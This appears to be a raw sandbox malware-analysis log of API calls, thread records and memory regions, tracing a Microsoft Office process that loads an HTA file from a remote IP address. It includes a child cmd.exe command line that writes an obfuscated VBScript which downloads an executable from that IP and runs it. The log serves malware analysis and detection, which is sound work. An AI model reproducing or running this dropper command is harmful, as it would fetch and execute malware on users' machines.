[0083.210] Shell:IUnknown:QueryInterface (in: This=0x330cb38, riid=0x74fe0580*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x3bee94 | out: ppvObject=0x3bee94*=0x330cb58) returned 0x0
[0083.210] Shell:IObjectWithSite:SetSite (This=0x330cb58, pUnkSite=0x2bf9318) returned 0x0
[0083.210] Shell:IUnknown:AddRef (This=0x2bf9318) returned 0x2
[0083.210] Shell:IUnknown:Release (This=0x330cb58) returned 0x1
[0083.210] Shell:IUnknown:QueryInterface (in: This=0x330cb38, riid=0x74fd4140*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3bee84 | out: ppvObject=0x3bee84*=0x330cb38) returned 0x0
[0083.210] Shell:IUnknown:AddRef (This=0x330cb38) returned 0x3
[0083.210] Shell:IUnknown:Release (This=0x330cb38) returned 0x2
[0083.210] Shell:IUnknown:Release (This=0x330cb38) returned 0x1
[0083.211] Shell:IUnknown:AddRef (This=0x330cb38) returned 0x2
[0083.213] Shell:IUnknown:AddRef (This=0x330cb38) returned 0x2
[0083.213] Shell:IUnknown:QueryInterface (in: This=0x330cb38, riid=0x74fd19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x3bef74 | out: ppvObject=0x3bef74*=0x0) returned 0x80004002
[0083.365] CDebugEventFire::IsActive () returned 0x1
[0083.365] GetCurrentThreadId () returned 0x848
[0083.365] GetCurrentThreadId () returned 0x848
[0083.365] GetCurrentThreadId () returned 0x848
[0083.390] IUnknown:Release (This=0x4e45a4) returned 0x9
[0083.391] IUnknown:Release (This=0x4e45a4) returned 0x8
[0083.391] IUnknown:Release (This=0x41c3cc) returned 0x7
[0083.391] IUnknown:Release (This=0x41c3cc) returned 0x6
[0083.391] LsGetRubyLsimethods () returned 0x0
[0083.391] LsGetTatenakayokoLsimethods () returned 0x0
[0083.391] LsGetHihLsimethods () returned 0x0
[0083.391] LsGetWarichuLsimethods () returned 0x0
[0083.391] LsGetReverseLsimethods () returned 0x0
[0083.391] LsCreateContext () returned 0x0
[0083.393] LsSetModWidthPairs () returned 0x0
[0083.396] SelectObject (hdc=0x2f0108d6, h=0x18a002e) returned 0x350a091c
[0083.396] LsQueryLineDup () returned 0x0
[0083.404] NtdllDefWindowProc_W () returned 0x10027
[0083.405] SetWindowLongW (hWnd=0x2021e, nIndex=-20, dwNewLong=262144) returned 262400
[0083.405] NtdllDefWindowProc_W () returned 0x0
[0083.405] NtdllDefWindowProc_W () returned 0x0
[0083.405] SetWindowPos (hWnd=0x2021e, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0083.405] NtdllDefWindowProc_W () returned 0x0
[0083.405] NtdllDefWindowProc_W () returned 0x0
[0083.406] NtdllDefWindowProc_W () returned 0x0
[0083.406] GlobalAddAtomW (lpString=0x0) returned 0x0
[0083.406] SetPropW (hWnd=0x2021c, lpString=0x0, hData=0x2021c) returned 0
[0083.406] ShowWindow (hWnd=0x2021e, nCmdShow=0) returned 0
[0083.406] UpdateWindow (hWnd=0x2021e) returned 1
[0083.406] GetCurrentThreadId () returned 0x848
[0083.406] GetCurrentThreadId () returned 0x848
[0083.406] GetCurrentThreadId () returned 0x848
[0083.410] NtdllDefWindowProc_W () returned 0x0
[0083.410] NtdllDefWindowProc_W () returned 0x0
[0083.410] CDebugEventFire::Release () returned 0x1
[0083.410] GetCurrentThreadId () returned 0x848
[0083.410] GetCurrentThreadId () returned 0x848
[0083.410] GetCurrentThreadId () returned 0x848
[0083.410] Shell:IUnknown:Release (This=0x2bf9318) returned 0x0
[0083.412] CDebugEventFire::EndSession () returned 0x0
[0083.412] CDebugEventFire::Release () returned 0x0
[0083.412] GetUserDefaultLCID () returned 0x409
[0083.412] GetACP () returned 0x4e4
Thread:
id = 179
os_tid = 0x524
Thread:
id = 180
os_tid = 0x554
[0082.046] GetCurrentThreadId () returned 0x554
Thread:
id = 181
os_tid = 0x5ec
[0082.064] GetCurrentThreadId () returned 0x5ec
Thread:
id = 182
os_tid = 0x5e8
[0082.075] GetCurrentThreadId () returned 0x5e8
[0082.571] GetCurrentThreadId () returned 0x5e8
[0082.571] PostMessageW (hWnd=0x10224, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0082.575] GetCurrentThreadId () returned 0x5e8
[0083.033] StrCmpICW (pszStr1="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10
[0083.033] StrCmpICW (pszStr1="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pszStr2="res://ieframe.dll/forbidframing.htm") returned -10
[0083.033] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2bee408 | out: ppURI=0x2bee408*=0x4e45a4) returned 0x0
[0083.034] IUri:GetSchemeName (in: This=0x4e45a4, pbstrSchemeName=0x2bee398 | out: pbstrSchemeName=0x2bee398*="http") returned 0x0
[0083.034] _wcsnicmp (_String1="http", _String2="data", _MaxCount=0x5) returned 4
[0083.034] IUri:GetScheme (in: This=0x4e45a4, pdwScheme=0x2bee3e4 | out: pdwScheme=0x2bee3e4*=0x2) returned 0x0
[0083.034] IUnknown:AddRef (This=0x4e45a4) returned 0x4
[0083.034] IUnknown:QueryInterface (in: This=0x4e45a4, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2bee3d8 | out: ppvObject=0x2bee3d8*=0x4e45a4) returned 0x0
[0083.034] IUnknown:Release (This=0x4e45a4) returned 0x4
[0083.034] IUnknown:AddRef (This=0x4e45a4) returned 0x5
[0083.034] GetCurrentThreadId () returned 0x5e8
[0083.034] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2bee3a8 | out: ppURI=0x2bee3a8*=0x4e45a4) returned 0x0
[0083.034] IUnknown:AddRef (This=0x4e45a4) returned 0x7
[0083.034] IUnknown:QueryInterface (in: This=0x4e45a4, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2bee378 | out: ppvObject=0x2bee378*=0x4e45a4) returned 0x0
[0083.035] IUnknown:Release (This=0x4e45a4) returned 0x7
[0083.035] IUnknown:AddRef (This=0x4e45a4) returned 0x8
[0083.035] IUnknown:Release (This=0x4e45a4) returned 0x7
[0083.035] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2bee38c | out: ppURI=0x2bee38c*=0x4e45a4) returned 0x0
[0083.035] IUnknown:Release (This=0x41c3cc) returned 0x10
[0083.035] IUnknown:Release (This=0x41c3cc) returned 0xf
[0083.035] IUnknown:AddRef (This=0x4e45a4) returned 0x9
[0083.035] IUnknown:QueryInterface (in: This=0x4e45a4, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2bee368 | out: ppvObject=0x2bee368*=0x4e45a4) returned 0x0
[0083.035] IUnknown:Release (This=0x4e45a4) returned 0x9
[0083.035] IUnknown:AddRef (This=0x4e45a4) returned 0xa
[0083.035] IUri:GetScheme (in: This=0x4e45a4, pdwScheme=0x2bee36c | out: pdwScheme=0x2bee36c*=0x2) returned 0x0
[0083.035] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x2bee348 | out: ppu=0x2bee348) returned 0x0
[0083.035] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2bee32c | out: ppURI=0x2bee32c*=0x4e45a4) returned 0x0
[0083.036] IUnknown:AddRef (This=0x4e45a4) returned 0xc
[0083.036] IInternetSecurityManager:MapUrlToZone (in: This=0x744096bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pdwZone=0x2bee2cc, dwFlags=0x0 | out: pdwZone=0x2bee2cc*=0xffffffff) returned 0x800c0011
[0083.036] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.036] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.036] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0083.036] IInternetSecurityManager:ProcessUrlAction (in: This=0x744096bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwAction=0x2700, pPolicy=0x2bee2d0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2bee2d0*=0x0) returned 0x0
[0083.036] IUnknown:Release (This=0x4e45a4) returned 0xb
[0083.036] IUnknown:Release (This=0x4e45a4) returned 0xa
[0083.036] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2bee2fc | out: phkResult=0x2bee2fc*=0x654) returned 0x0
[0083.036] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2bee300 | out: phkResult=0x2bee300*=0x658) returned 0x0
[0083.036] RegOpenKeyExW (in: hKey=0x658, lpSubKey="FEATURE_CODEPAGE_INHERIT", ulOptions=0x0, samDesired=0x1, phkResult=0x2bee2bc | out: phkResult=0x2bee2bc*=0x0) returned 0x2
[0083.036] RegOpenKeyExW (in: hKey=0x654, lpSubKey="FEATURE_CODEPAGE_INHERIT", ulOptions=0x0, samDesired=0x1, phkResult=0x2bee2bc | out: phkResult=0x2bee2bc*=0x0) returned 0x2
[0083.036] RegCloseKey (hKey=0x0) returned 0x6
[0083.036] RegCloseKey (hKey=0x0) returned 0x6
[0083.036] RegCloseKey (hKey=0x654) returned 0x0
[0083.036] RegCloseKey (hKey=0x658) returned 0x0
[0083.036] IUnknown:QueryInterface (in: This=0x4e45a4, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2bee10c | out: ppvObject=0x2bee10c*=0x4e45a4) returned 0x0
[0083.037] IUnknown:Release (This=0x4e45a4) returned 0xa
[0083.037] IUnknown:AddRef (This=0x4e45a4) returned 0xb
[0083.037] IUri:GetPropertyDWORD (in: This=0x4e45a4, uriProp=0x11, pdwProperty=0x2bee0fc, dwFlags=0x0 | out: pdwProperty=0x2bee0fc*=0x2) returned 0x0
[0083.037] IInternetSecurityManager:GetSecurityId (in: This=0x426ed8, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x2bee160, pcbSecurityId=0x2bee15c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2bee160*=0x68, pcbSecurityId=0x2bee15c*=0x17) returned 0x0
[0083.037] IInternetSecurityManager:GetSecurityId (in: This=0x744096bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x2bee160, pcbSecurityId=0x2bee15c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2bee160*=0x0, pcbSecurityId=0x2bee15c*=0x200) returned 0x800c0011
[0083.037] IUnknown:Release (This=0x4e45a4) returned 0xa
[0083.037] IUnknown:AddRef (This=0x41c3cc) returned 0x10
[0083.037] IUri:GetPropertyDWORD (in: This=0x41c3cc, uriProp=0x11, pdwProperty=0x2beded4, dwFlags=0x0 | out: pdwProperty=0x2beded4*=0xb) returned 0x0
[0083.037] IInternetSecurityManager:GetSecurityId (in: This=0x426ed8, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x2bedf30, pcbSecurityId=0x2bedf2c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2bedf30*=0x68, pcbSecurityId=0x2bedf2c*=0x11) returned 0x0
[0083.037] IInternetSecurityManager:GetSecurityId (in: This=0x744096bc, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x2bedf30, pcbSecurityId=0x2bedf2c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2bedf30*=0x0, pcbSecurityId=0x2bedf2c*=0x200) returned 0x800c0011
[0083.037] IUnknown:Release (This=0x41c3cc) returned 0xf
[0083.037] IUnknown:Release (This=0x4e45a4) returned 0x9
[0083.038] IUnknown:Release (This=0x41c3cc) returned 0xe
[0083.038] IUnknown:Release (This=0x41c3cc) returned 0xd
[0083.038] IUnknown:AddRef (This=0x4e45a4) returned 0xa
[0083.038] IUnknown:QueryInterface (in: This=0x4e45a4, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2bee3d8 | out: ppvObject=0x2bee3d8*=0x4e45a4) returned 0x0
[0083.038] IUnknown:Release (This=0x4e45a4) returned 0xa
[0083.038] IUnknown:AddRef (This=0x4e45a4) returned 0xb
[0083.038] IUnknown:Release (This=0x4e45a4) returned 0xa
[0083.038] GetCurrentThreadId () returned 0x5e8
[0083.039] GetCurrentThreadId () returned 0x5e8
[0083.182] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc198
[0083.182] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc19a
[0083.182] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc1d2
[0083.182] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc1a4
[0083.182] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc1a6
[0083.182] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc1a5
[0083.182] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc1aa
[0083.182] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc1ab
[0083.182] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc1ac
[0083.182] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc1ae
[0083.182] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc1ad
[0083.182] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc1b0
[0083.182] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc1b1
[0083.182] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc1b2
[0083.182] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc1d3
[0083.182] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc1d4
[0083.182] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc1a8
[0083.182] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc1a9
[0083.182] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc1af
[0083.182] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2bed09c | out: phkResult=0x2bed09c*=0x65c) returned 0x0
[0083.182] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2bed0a0 | out: phkResult=0x2bed0a0*=0x660) returned 0x0
[0083.182] RegOpenKeyExW (in: hKey=0x660, lpSubKey="FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561", ulOptions=0x0, samDesired=0x1, phkResult=0x2bed05c | out: phkResult=0x2bed05c*=0x0) returned 0x2
[0083.182] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561", ulOptions=0x0, samDesired=0x1, phkResult=0x2bed05c | out: phkResult=0x2bed05c*=0x0) returned 0x2
[0083.183] RegCloseKey (hKey=0x0) returned 0x6
[0083.183] RegCloseKey (hKey=0x0) returned 0x6
[0083.183] RegCloseKey (hKey=0x65c) returned 0x0
[0083.183] RegCloseKey (hKey=0x660) returned 0x0
[0083.183] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19
[0083.183] GetCurrentProcessId () returned 0x9ac
[0083.183] SystemTimeToFileTime (in: lpSystemTime=0x2bedf04, lpFileTime=0x446c34 | out: lpFileTime=0x446c34) returned 1
[0083.183] StrCmpICA (pszStr1="HTTP/1.0", pszStr2="HTTP/1.1") returned -1
[0083.184] GetCurrentThreadId () returned 0x5e8
[0083.184] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/octet-stream", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0083.184] GetCurrentThreadId () returned 0x5e8
[0083.185] GetCurrentThreadId () returned 0x5e8
[0083.185] MulDiv (nNumber=1, nNumerator=4000, nDenominator=2113) returned 2
[0083.185] MulDiv (nNumber=102, nNumerator=1000, nDenominator=4100) returned 25
[0083.185] MulDiv (nNumber=100, nNumerator=10000, nDenominator=1000) returned 1000
[0083.185] MulDiv (nNumber=1, nNumerator=1000, nDenominator=2112) returned 0
[0083.185] PostMessageW (hWnd=0x10224, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0083.185] GetCurrentThreadId () returned 0x5e8
[0083.187] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="https://urlz.fr/8gYe", pSecMgr=0x0) returned 0x1
[0083.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2bef178 | out: phkResult=0x2bef178*=0x39c) returned 0x0
[0083.188] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2bef17c | out: phkResult=0x2bef17c*=0x65c) returned 0x0
[0083.188] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x2bef138 | out: phkResult=0x2bef138*=0x0) returned 0x2
[0083.188] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x2bef138 | out: phkResult=0x2bef138*=0x0) returned 0x2
[0083.188] RegCloseKey (hKey=0x0) returned 0x6
[0083.188] RegCloseKey (hKey=0x0) returned 0x6
[0083.188] RegCloseKey (hKey=0x39c) returned 0x0
[0083.188] RegCloseKey (hKey=0x65c) returned 0x0
[0083.188] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\AXVHa[1].hta", pBuffer=0x2bef218, cbSize=0xc8, pwzMimeProposed="application/octet-stream", dwMimeFlags=0x6, ppwzMimeOut=0x2bef1d0, dwReserved=0x0 | out: ppwzMimeOut=0x2bef1d0*="application/hta") returned 0x0
[0083.189] CoTaskMemFree (pv=0x333c818)
[0083.189] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="https://urlz.fr/8gYe", pSecMgr=0x0) returned 0x1
[0083.189] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1
[0083.190] GetCurrentThreadId () returned 0x5e8
[0083.190] SetEvent (hEvent=0x150) returned 1
[0083.190] GetCurrentThreadId () returned 0x5e8
[0083.190] MulDiv (nNumber=2112, nNumerator=4000, nDenominator=2113) returned 3998
Thread:
id = 183
os_tid = 0x348
[0082.247] GetCurrentThreadId () returned 0x348
Thread:
id = 184
os_tid = 0x578
[0082.303] GetCurrentThreadId () returned 0x578
Thread:
id = 185
os_tid = 0x664
[0082.371] GetCurrentThreadId () returned 0x664
Thread:
id = 186
os_tid = 0x668
[0082.373] GetCurrentThreadId () returned 0x668
[0082.373] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x73ed0000
[0082.373] CoInitialize (pvReserved=0x0) returned 0x0
[0082.374] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0
[0083.190] GetTickCount () returned 0x22700
[0083.191] GetCurrentThreadId () returned 0x668
[0083.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x332dcb8, cbMultiByte=2113, lpWideCharStr=0x33247e4, cchWideChar=2113 | out: lpWideCharStr="\r\n\r\n\r\n\r\n") returned 2113
[0083.192] PostMessageW (hWnd=0x10224, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0083.192] GetTickCount () returned 0x2270f
[0083.192] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0
[0083.195] GetTickCount () returned 0x2270f
[0083.195] IUnknown:AddRef (This=0x4e45a4) returned 0xf
[0083.195] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x34bfa84 | out: lpCPInfo=0x34bfa84) returned 1
[0083.195] IUnknown:AddRef (This=0x4e45a4) returned 0x10
[0083.195] IUnknown:QueryInterface (in: This=0x4e45a4, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x34bfa8c | out: ppvObject=0x34bfa8c*=0x4e45a4) returned 0x0
[0083.196] IUnknown:Release (This=0x4e45a4) returned 0x10
[0083.196] IUnknown:AddRef (This=0x4e45a4) returned 0x11
[0083.196] IUri:GetScheme (in: This=0x4e45a4, pdwScheme=0x34bfa90 | out: pdwScheme=0x34bfa90*=0x2) returned 0x0
[0083.196] IUnknown:Release (This=0x4e45a4) returned 0x10
[0083.197] GetTickCount () returned 0x2270f
[0083.197] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0
[0083.365] GetTickCount () returned 0x227bb
[0083.365] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0
[0083.413] CoUninitialize ()
[0083.413] FreeLibraryAndExitThread (hLibModule=0x73ed0000, dwExitCode=0x0)
[0083.413] GetCurrentThreadId () returned 0x668
Thread:
id = 189
os_tid = 0x90
[0082.423] GetCurrentThreadId () returned 0x90
Thread:
id = 190
os_tid = 0x214
[0082.606] GetCurrentThreadId () returned 0x214
Thread:
id = 191
os_tid = 0x564
[0083.221] GetCurrentThreadId () returned 0x564
[0083.363] GetCurrentThreadId () returned 0x564
Thread:
id = 192
os_tid = 0x464
[0083.367] GetCurrentThreadId () returned 0x464
Process:
id = "11"
image_name = "cmd.exe"
filename = "c:\\windows\\syswow64\\cmd.exe"
page_root = "0x185a3000"
os_pid = "0x330"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "10"
os_parent_pid = "0x9ac"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs "
cur_dir = "C:\\Program Files\\Microsoft Office\\Root\\Office16\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2160
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2161
start_va = 0x30000
end_va = 0x32fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2162
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x40000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2163
start_va = 0x50000
end_va = 0x53fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2164
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 2165
start_va = 0x1b0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2166
start_va = 0x2a0000
end_va = 0x39ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 2167
start_va = 0x4ab30000
end_va = 0x4ab7bfff
entry_point = 0x4ab30000
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")
Region:
id = 2168
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2169
start_va = 0x77e20000
end_va = 0x77f9ffff
entry_point = 0x77e20000
